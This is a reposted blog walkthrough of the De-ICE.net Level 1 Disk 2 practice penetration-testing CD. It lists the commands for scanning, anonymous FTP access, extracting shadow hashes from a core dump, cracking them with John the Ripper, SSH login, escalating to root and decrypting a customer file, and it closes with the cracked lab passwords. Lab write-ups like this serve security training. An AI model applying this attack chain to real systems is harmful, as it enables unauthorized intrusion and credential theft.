Monday, September 12, 2011

HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}

*** Do NOT attack any computer or network without authorization or you may put into jail. ***

Credit to : g0tmi1k

This is g0tmi1k's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.

The original post at here

Links

Watch video on-line
Download video

What is this?

This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

What do I need?

BackTrack 4 (Final)
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)
Dictionary(s)

Software
Name: De-ICE.net
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/

Download Link:

http://www.mediafire.com/?tnci5ewmcoyrp8o
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&cache=cache&media=wiki:de-ice_netcat-1.0.iso
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso

Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

nmap -n 192.168.1.1-255

nmap -n -sS -sV -O 192.168.1.110

firefox 192.168.1.110

[+]kate -> make list of possible usernames

// lastF, fLast

ftp 192.168.1.110

// Username: anonymous. Password: [Blank]

ls -a

cd download

ls -a

cd etc

ls -a

get core

exit

strings core

[+]Copy from 'root:$...' to '[EOF]'. Kate -> New -> Paste. Format so each username is one its own line -> Save. Filename: shadow

cd tools/dictionary/

cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords

john

./john --rules --wordlist=/root/passwords /root/shadow
//Password: root:Complexity & ccofee:Diatomaceous

ssh ccofee@192.168.1.110
//Password: Diatomaceous

ls -a

cd ..

ls -a

cd root/

ls -a

cd .save/

su
//Password: Complexity

cd .save/

ls -a

cat copy.sh

openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw

ls -a

cat customer_account.csv
// GAME OVER

----------------------------------------------------------------------------------------------------
Users
root:Complexity = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::
aadams: = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0: 99999:7:::
bbanter:Zymurgy = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0 :99999:7:::
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::
----------------------------------------------------------------------------------------------------


Notes

Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html

That's all! See you!